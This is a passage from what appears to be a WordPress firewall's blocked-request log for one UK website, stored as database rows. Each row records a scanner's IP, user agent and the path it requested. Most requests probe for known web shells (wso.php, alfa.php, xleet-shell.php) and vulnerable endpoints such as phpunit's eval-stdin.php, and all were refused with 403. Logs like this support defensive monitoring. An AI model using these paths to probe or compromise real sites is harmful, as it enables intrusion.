Safari\\/537.36\",\"2\":\"www.bing.com\"}','iRkoz0jrJs9hB6m4aKTnECyd',0,1673717896.9283,192,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','SYgstjFBKhd4rVNZOI6AzHCD',0,1673717927.0165,210,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','iEKj93SA4MtsTFlY5qyJIo2V',0,1673717927.2763,202,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','2kItSYoCEQ9NneMaF63rdTgw',0,1673717928.9347,190,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','61ZnlF5wEODSsaWcHLuKBmYi',0,1673717933.4067,172,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','VSsPyGdT4Xrtfe8NAKJFolQ6',0,1673717949.8367,235,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','QfgYyRamDNSvM8rVGhc60jpd',0,1673717958.1966,213,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','P5KwarlDeZuynIogGfdBJpjC',0,1673717966.0670,206,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; HRY-LX1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.106 Mobile Safari\\/537.36\"}','X2ApDCYInaByPiZ6RKh84kfb',0,1673733496.5933,231,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/13.1 Mobile\\/15E148 Safari\\/604.1\"}','eIu4nzsfgNM71RX83QxPmC6B',0,1673733496.6119,222,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/bala.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 12_4_8 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/12.1.2 Mobile\\/15E148 Safari\\/604.1\"}','NcUevzP4Jnf8k62H1KpWdDj9',0,1673733496.6142,279,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wsa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.75 Safari\\/537.36\"}','bZEIdghHepo3vW61wXPzJjRs',0,1673733496.6128,280,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0 Mobile\\/15E148 Safari\\/604.1\"}','VlF93muMQLCnAzK5boTye8gW',0,1673733496.6461,269,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/logs.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','eTivfUKoB4E8bSuCAZOFsg6z',0,1673733496.8471,193,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/local.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; HRY-LX1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.106 Mobile Safari\\/537.36\"}','1XCKINzot7jPFDORG2QV94rp',0,1673733497.0034,185,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/ffAA531.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/12.1.2 Mobile\\/15E148 Safari\\/604.1\"}','rcvDixINTgmQt6j873LZJGsV',0,1673733497.0065,193,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','bADaH3sRg9EnCcYiPuOy4J6F',0,1673733497.0834,197,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wp-2019.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','wqSBTeap2IKV6GMQkxEshm7D',0,1673733497.0809,245,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/alwso.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0 Mobile\\/15E148 Safari\\/604.1\"}','wv3gcnkSHmW4V5G2rBTFOAYz',0,1673733497.0753,276,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wp-fox.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) HeadlessChrome\\/88.0.4298.0 Safari\\/537.36\"}','2e3SFWXyoU50YcjrRdhquDf7',0,1673733497.1485,259,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/511.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A505FN) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.110 Mobile Safari\\/537.36\"}','qNTh2b8SLoR4fPpGDYm6jJs1',0,1673733497.4575,255,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.66 Safari\\/537.36\"}','Qk0HuN6sWqA5GUefompOZ1Y9',0,1673733497.4615,252,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/panel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','bzSMvcyLB1G6QJ7D0F5Timqk',0,1673733497.4594,275,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0 Mobile\\/15E148 Safari\\/604.1\"}','kP9tc5oaiYDqSdQv1VTuh3FU',0,1673733497.4616,272,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 13_5 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/13.1.1 Mobile\\/15E148 Safari\\/604.1\"}','Q0Mmr6JekDVF82nCcuLNhgTd',0,1673733497.5004,256,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/oldindex.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 9; SAMSUNG SM-G950F) AppleWebKit\\/537.36 (KHTML, like Gecko) SamsungBrowser\\/12.1 Chrome\\/79.0.3945.136 Mobile Safari\\/537.36\"}','kChZo9YrTunKwXS1p4fMNPL8',0,1673733497.5003,271,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/wp-log.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 9; FLA-LX1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.106 Mobile Safari\\/537.36 OPR\\/59.1.2926.54067\"}','WLTbDQ2Xd5nYMoPiUIBuc6Kj',0,1673733497.5626,254,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/Anon.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','fnmGNcdJSDB6lyP9Xtk5i4g2',0,1673733497.8912,172,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/.wp-back.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','qudBTi8CN9SIWsmO3YrGPcng',0,1673733497.8882,177,'','GET',403,0,700,0,1,'',0),('159.203.93.66',2680905026,'','https://dailyjolly.co.uk/.wp-themes.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0.2 Mobile\\/15E148 Safari\\/604.1\"}','x7olWsBN8IGJSTChMEvAP92Z',0,1673733497.8841,181,'','GET',403,0,700,0,1,'',0),('147.78.47.249',2471374841,'','https://dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/105.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/wp-content\\/plugins\\/wp-file-manager\\/lib\\/php\\/connector.minimal.php\"}','56VX04zP7FoD9ZSMrANsLvhm',0,1673775037.9087,202,'','GET',403,0,700,0,1,'',0),('109.248.175.208',1845014480,'','https://www.dailyjolly.co.uk/wp-content/themes/westand/include/lang_upload.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','SLCjHzo75di4aRPXrEYtvI1T',0,1673776647.3529,257,'','GET',403,0,700,0,1,'',0),('143.198.193.188',2412167612,'','https://dailyjolly.co.uk/installer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','jtsYrhbkwcouzNAevH9OIJn4',0,1673777891.2649,208,'','GET',403,0,700,0,1,'',0),('37.76.27.211',625744851,'','https://www.dailyjolly.co.uk/adminer.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','EwkVOsF8lS6JbogYMzteiCaU',0,1673787446.3390,245,'','GET',403,0,700,0,1,'',0),('41.251.178.115',704361075,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.28.1\"}','G0KZeiJS7t48Yn2aOlqpf6wB',0,1673801877.1189,259,'','GET',403,0,700,0,1,'',0),('41.251.178.115',704361075,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.28.1\"}','rIHsk9b7KCxi3cNuhJzOAE1P',0,1673804804.2551,186,'','GET',403,0,700,0,1,'',0),('194.32.120.168',3256907944,'','https://dailyjolly.co.uk/wp-admin/imagescheckflush.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','4ZGKnoNWYjU1P3hfwBd6eiTX',0,1673811021.1530,198,'','POST',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/rxonxxhu.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','BJHuLoYnrGNbljTzFXxdc3ye',0,1673813763.2277,3050,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iz7upDqwNRsP5V6EZAcUgQv8',0,1673824209.2822,1433,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','IhA3BcZjOTyVw167M2kLrJsm',0,1673835818.8714,307,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"python-requests\\/2.28.1\"}','BbSAPlIuYMzWqt0LCoHFiD72',0,1673840359.9359,595,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/2index.php','','{\"1\":\"python-requests\\/2.28.1\"}','OTxRg8yvmk5qdG4bFaANXeor',0,1673840372.9513,803,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"python-requests\\/2.28.1\"}','2jdirEUz5MPlWZB1ACbafTHO',0,1673840386.2465,406,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','nRlKZ8yoVD3pjIOTBUXbhFtQ',0,1673840402.4441,523,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/content.php','','{\"1\":\"python-requests\\/2.28.1\"}','2LIup0B5qvNT7mjxndPMQyFw',0,1673840422.4308,411,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/old-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','4DVQaltr3FTZMNg9UubwzKeY',0,1673840439.1600,641,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/new-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','k6BLA3Tyrqh4sdWXuignONac',0,1673840447.7194,613,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','ALr8oNXlvaSbHJgs7FuCDwBE',0,1673840458.3401,465,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/xm.php','','{\"1\":\"python-requests\\/2.28.1\"}','ZixoeT0dpc81ybuamBVMwjQv',0,1673840468.7302,942,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','YCPMuZdvmblEjof6expNqwzQ',0,1673840476.6863,561,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"python-requests\\/2.28.1\"}','4D5NREWpZuKtqOmXHrUAvL1o',0,1673840484.7343,480,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/media-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','62hAfbPuvIOwG5VFnUx0BYdg',0,1673840497.4423,667,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/mt/pekok.php','','{\"1\":\"python-requests\\/2.28.1\"}','43wHXOMSv8nDRhxjiTmduIYa',0,1673840507.4342,556,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.28.1\"}','5VkWmx90MRE4jPFI3yteGQvX',0,1673840539.2883,833,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','pPe5ywlGaJ1hEDdgZtqi0LcX',0,1673840549.6822,1145,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','LaOGCP6AgsoiRdJm4WIxt2Qh',0,1673840557.7661,658,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','4SUstKjTyQYCr0E5uVkxMq1L',0,1673840566.3923,679,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','iG71Jh80fIctZbj42QY5OR6o',0,1673840578.8893,482,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','QZPOyWHxa6qYAibc4d8gCeXz',0,1673840590.0542,492,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','L6whH2jAxWBld8uO3rvPC0kt',0,1673840598.4463,915,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','hoDa74OAjecnyHIg2ZNGkTvP',0,1673840628.9662,484,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','x8tQgCozK0DbS3Yl6hawTknN',0,1673840637.1149,659,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"python-requests\\/2.28.1\"}','jCzFYreukbdSGtXxpqAcK173',0,1673840649.1661,659,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','tiGk2fY6orgZVIh7l8xLnvJR',0,1673840657.2080,656,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','IopLfERvc6WDGz9gSkbeJN41',0,1673840671.0040,539,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','p37jfceLCiOd0AJbqxNn8YQy',0,1673840681.1463,430,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','9kIzQhbLp1HFRtyEvWYPfx4J',0,1673840689.0560,416,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/alwso.php','','{\"1\":\"python-requests\\/2.28.1\"}','VoM0A3IndsTxuqm1aHtlr6y7',0,1673840700.0005,354,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','ZEzQrTlvCsB6SW5HFncyeMLh',0,1673840710.0807,299,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"python-requests\\/2.28.1\"}','zK9JTSPE7rFGCYUQ4bvmZfiO',0,1673840750.6169,306,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/shell20220621.php','','{\"1\":\"python-requests\\/2.28.1\"}','ZNgQcxtSToGn5a9VqHfhBP7u',0,1673840857.8875,292,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','xGBtsMUIKaFChEJwgHYDA7k9',0,1673840865.6027,325,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','ItBfQROhYcrMCdmwAsN1EKPa',0,1673840921.5169,372,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"python-requests\\/2.28.1\"}','qbitO27h1dxln3VHAjMJXyaY',0,1673840934.4052,216,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"python-requests\\/2.28.1\"}','sUh3LdTgFK62SopjMaA0QtWE',0,1673840943.7511,237,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','ELBcZSDXlftYhbTgyw8OqpQm',0,1673840951.8269,307,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','21lnUsCZpBz5JWXYjDFgV8a0',0,1673840967.8791,244,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','DlesEgQ1CkryzMO2ufmRw4h3',0,1673840978.5088,228,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','9Ck6tG8cNTDRBE3AVXubgPUW',0,1673840996.4675,260,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"python-requests\\/2.28.1\"}','yQ7eXsgaPGJ1Whi6vxMOnEpZ',0,1673841037.8817,202,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','gtU74e0r8jkIYHTAfivlBb6X',0,1673841061.5399,287,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','97R1OXA5gF84WknNo6zyqpTj',0,1673841078.9817,247,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','i8bCaoBZe7FDsdQ0RYhg6urV',0,1673841096.6825,197,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/.tmb/cache/shz.php','','{\"1\":\"python-requests\\/2.28.1\"}','f5VsI6vD7Tq3kjx9RzP0chZe',0,1673841146.0860,245,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','Kegu6ABoFDWTXmdnP0jIEZbH',0,1673841158.7217,257,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','PmHwq0zXDhGt27cajUi9dQyF',0,1673841173.2121,197,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','9EknCyKUfu2VZNX8jzqvrL5w',0,1673841183.6065,230,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"python-requests\\/2.28.1\"}','fR2loGUwPq4vkb1OdAB896SD',0,1673841198.7020,251,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/sym403.php','','{\"1\":\"python-requests\\/2.28.1\"}','PCtuVDTrz3QIglOYKLFkmxhU',0,1673841219.2558,229,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','jXAv15McSHZD7IJP0dzC92lt',0,1673841263.2793,209,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.28.1\"}','TO6NjLW32FQ58Dk1udPvSGiV',0,1673841303.3342,201,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','D14uCImdZbOiXBypAwLo7qFk',0,1673841317.6013,189,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.28.1\"}','rGnH7ER8uNbko0mUPIvKgd1B',0,1673841330.0856,197,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','ewp45giVYtIFu9mZMfLjAc3T',0,1673841346.4138,195,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','abv3noZOgG1W8BT2Qw4qyFPx',0,1673841441.2941,289,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/indeeex.php','','{\"1\":\"python-requests\\/2.28.1\"}','Kome6hVvMaA195zrUjQ4ycfx',0,1673841449.9136,292,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/ne.php','','{\"1\":\"python-requests\\/2.28.1\"}','U04wxkPmYtuSFXbvArfKRONi',0,1673841458.7903,193,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/ff.php?pass=shell','','{\"1\":\"python-requests\\/2.28.1\"}','dH8Rw6fCbiu4SGTPo0JVn1Et',0,1673841467.5426,216,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/8.php','','{\"1\":\"python-requests\\/2.28.1\"}','UovIJRze46wbnKkGxmhfy2Z7',0,1673841476.7537,194,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','j83cQY1wZ6CFnyoa0emiqKTX',0,1673841487.0439,222,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/IXR/hunt.php','','{\"1\":\"python-requests\\/2.28.1\"}','SOvYh4dUIj0372glswJWCnaV',0,1673841500.0204,198,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"python-requests\\/2.28.1\"}','zTgakneQrSBdv3CujiwVlYtM',0,1673841534.7172,858,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/1975.php','','{\"1\":\"python-requests\